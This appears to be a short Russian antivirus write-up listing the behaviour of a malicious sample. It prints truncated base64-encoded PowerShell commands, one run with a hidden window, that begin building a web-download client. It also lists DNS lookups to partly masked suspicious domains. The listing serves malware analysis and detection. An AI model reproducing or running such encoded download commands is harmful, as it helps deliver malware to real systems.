Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAEEAbwBBAG8AQQAxAHgAPQAoACcAYwBBACcAKwAnADEAQQB3AEIAeABrACcAKQA7ACQAaABCAEIAeABBADEAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AJwArACcAYgBqAGUAYwB0ACcAKQAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAE...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1528
- %TEMP%\804434.cvr
- DNS ASK me###lzado.com
- DNS ASK ca###eco.com
- DNS ASK ki##se.ir
- DNS ASK dq###sign.com
- DNS ASK on###otar.cl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAEEAbwBBAG8AQQAxAHgAPQAoACcAYwBBACcAKwAnADEAQQB3AEIAeABrACcAKQA7ACQAaABCAEIAeABBADEAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AJwArACcAYgBqAGUAYwB0ACcAKQAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAE...' (со скрытым окном)